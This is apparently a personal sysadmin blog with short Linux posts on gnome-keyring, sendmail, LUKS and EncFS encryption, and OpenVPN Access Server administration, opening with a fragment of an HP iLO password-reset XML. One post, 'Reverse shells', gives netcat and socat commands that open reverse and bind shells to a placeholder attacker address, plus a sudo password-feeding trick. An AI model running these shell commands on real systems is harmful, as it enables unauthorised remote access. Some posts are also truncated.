 <LOGIN USER_LOGIN="Administrator" PASSWORD="boguspassword">
  <USER_INFO MODE="write">
   <MOD_USER USER_LOGIN="Administrator">
    <PASSWORD value="NewPass123"/>
   </MOD_USER>
  </USER_INFO>
 </LOGIN>
</RIBCL>
November 26, 2016 — 17:52

Author: silver  Category: linux  Comments: Off


gnome-keyring-daemon -r -d

If that doesn't suffice, these extra steps might help:

pgrep -f gnome-keyring-daemon
rm -rf ~/.cache/keyring-*
setsid /usr/bin/gnome-keyring-daemon >/dev/null 2>&1
ln -s ~/.cache/keyring-* $GNOME_KEYRING_CONTROL
/usr/bin/gnome-keyring-daemon --start --components=pkcs11
/usr/bin/gnome-keyring-daemon --start --components=gpg
/usr/bin/gnome-keyring-daemon --start --components=ssh
find ~/.cache/ -maxdepth 1 -type l -name 'keyring-*' -delete
sendmail with attachment
November 26, 2016 — 17:48

Author: silver  Category: linux  Comments: Off

Oneliner to send email with attachment using sendmail:

$S Subject
$B Body
$A Attachment

Display man pages as text
November 26, 2016 — 15:51

Author: silver  Category: linux  Comments: Off
man openssl | cat
man -P cat openssl
groff -t -e -mandoc -Tascii manpage.1 | col -bx > manpage.txt
Linux Disk Encryption
November 26, 2016 — 13:04

Author: silver  Category: encryption linux  Comments: Off

Linux disk encryption using the device mapper, the cryptsetup frontend and the LUKS (Linux Unified Key Setup) on-disk format.


cryptsetup -y -v luksFormat /dev/sdb1
cryptsetup luksOpen /dev/sdb1 foo
cryptsetup status foo -v

Also keep a backup of the LUKS header somewhere safe (cryptsetup luksHeaderBackup): if the header is damaged the data is gone, regardless of the passphrase.


cryptsetup --test-passphrase open /dev/sdb1 # generic action name; no mapping name needed with --test-passphrase
cryptsetup luksOpen --test-passphrase /dev/sdb1
cryptsetup isLuks /dev/sdb1 && echo IMaLUKS
cryptsetup luksDump /dev/sdb1


(asks current passphase first)

cryptsetup -y luksChangeKey <target device> -S <target key slot number>
cryptsetup -y luksChangeKey /dev/sdb1 -S 1

Or use gui gnome-disks:

  • Disks (gnome-disks)
  • 1.0TB Hard Disk
  • Volumes: “Partition 1 1.0 TB LUKS”
  • Cogs/wheels

Add/remove key:

sudo cryptsetup -y luksAddKey ENCRYPTED_PARTITION
sudo cryptsetup luksRemoveKey ENCRYPTED_PARTITION


dmsetup ls --tree
lsblk --fs
Reverse shells
November 26, 2016 — 12:45

Author: silver  Category: linux  Comments: Off



Listener on the attacker side, then connect back from the target (<attacker-ip> and <target-ip> below are placeholders; the addresses were lost from the page). Note that -e exists in traditional/GNU netcat but not in the OpenBSD nc:

netcat -lvp 9999

netcat -e /bin/sh <attacker-ip> 9999

Upgrade the dumb shell to a pty, or drive a password into sudo through one:

python -c 'import pty; pty.spawn("/bin/bash")'
( sleep 1; echo 'bla' ) | python -c "import pty; pty.spawn(['/usr/bin/sudo','-S','whoami']);"

socat gives a fully interactive tty. Listener on the attacker, then the target connects with a pty-wrapped login shell:

socat file:`tty`,raw,echo=0 tcp-listen:8888

socat tcp:<attacker-ip>:8888 exec:'bash -li',pty,stderr,setsid,sigint,sane

Or the other way round, a bind shell on the target and the attacker connects to it:

socat TCP-LISTEN:8888,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
socat FILE:`tty`,raw,echo=0 TCP:<target-ip>:8888

Fix the terminal afterwards (unset STY so screen doesn't think it is nested, and give the pty a size):

export STY=
stty rows 40 cols 130
stty rows 40 cols 230
November 25, 2016 — 22:02

Author: silver  Category: encryption linux  Comments: Off

Install EncFS on CentOS 6. Keep in mind that EncFS's 2014 security audit found it unsafe against an attacker who can obtain several snapshots of the encrypted directory (a cloud-sync target, for instance), so treat it as protection for a single lost copy, not against a hostile storage provider:

Required packages:

yum install -y fuse-2.8.3-5.el6.x86_64 
yum install -y fuse-libs.x86_64
yum install -y fuse-devel.x86_64
usermod -a -G fuse <your_user>
yum install -y git
yum install -y cmake
yum install -y boost-serialization.x86_64
yum install -y openssl-devel.x86_64
yum install -y rlog-devel.x86_64
yum install -y tinyxml2-devel.x86_64 
yum install -y gettext-devel.x86_64
yum install -y centos-release-scl
yum install -y devtoolset-3-gcc-c++


scl enable devtoolset-3 bash
git clone
cd encfs
mkdir build
cd build
cmake ..
make
make test
make install
make package
mkdir ~/test
mkdir ~/Private


encfs ~/Private ~/test
echo testing > ~/test/testfile
fusermount -u ~/test
November 25, 2016 — 21:31

Author: silver  Category: encryption linux  Comments: Off

OpenVPN Access Server is quite easy and fast to setup and includes a web gui.



Clickety click in the gui, plus some hardening:



auth SHA512
cipher AES-256-CBC

(on OpenVPN 2.4 and later prefer an AEAD cipher, cipher AES-256-GCM, and set tls-version-min 1.2)

Connect with SSH + SOCKS proxy + OTP:

$ ssh -D <local-port> <remote-host>

Ban user:

Ban a user from logging into the VPN or Web server
(doesn’t affect a user who is already logged in — for this, use DisconnectUser below):

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value true UserPropPut

Re-admit a user who was previously banned:

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value false UserPropPut

Disconnect a user:

/usr/local/openvpn_as/scripts/sacli --user <USER> DisconnectUser

Set client cert keysize:

/usr/local/openvpn_as/scripts/sa --keysize=4096 Init

Generating init scripts:

/usr/local/openvpn_as/scripts/openvpnas_gen_init [--auto]

Google Authenticator:

Unlock a secret:

./sacli -u <USER> --lock 0 GoogleAuthLock

Lock a secret:

./sacli -u <USER> --lock 1 GoogleAuthLock

Generate a new, unlocked secret:

./sacli -u <USER> --lock 0 GoogleAuthRegen

Generate a new, locked secret:

./sacli -u <USER> --lock 1 GoogleAuthRegen

Enable Google Authenticator for all accounts:

./sacli --key vpn.server.google_auth.enable --value true ConfigPut

Enable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value true UserPropPut


Disable Google Authenticator for all accounts:

./sacli --key vpn.server.google_auth.enable --value false ConfigPut

Disable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value false UserPropPut

Revoke and reissue secret:

./sacli -u <USER> GoogleAuthRegen

Retrieve current user properties:

./confdba -us -p

Port sharing:

Advanced VPN Settings: port-share 10443
(tcp mode only)
